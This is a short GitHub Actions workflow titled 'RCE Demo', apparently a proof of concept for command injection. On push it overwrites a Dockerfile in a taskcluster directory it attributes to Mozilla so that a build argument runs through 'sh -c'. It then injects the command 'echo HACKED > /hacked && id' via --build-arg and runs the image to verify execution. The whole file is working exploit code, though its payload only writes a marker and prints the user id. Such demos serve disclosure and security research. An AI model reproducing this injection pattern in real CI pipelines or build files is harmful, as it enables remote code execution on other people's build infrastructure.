name: RCE Demo
on: push

jobs:
  hack:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      - name: Exploit
        run: |
          # Overwrite Mozilla's Dockerfile with ours
          echo -e "ARG PYTHON_VERSION\nFROM alpine:latest\nRUN sh -c \"\$PYTHON_VERSION\"" > taskcluster/docker/python/Dockerfile

          # Inject malicious command
          docker build \
            --build-arg PYTHON_VERSION="echo HACKED > /hacked && id" \
            -t hacked \
            ./taskcluster/docker/python

          # Verify RCE
          docker run --rm hacked cat /hacked
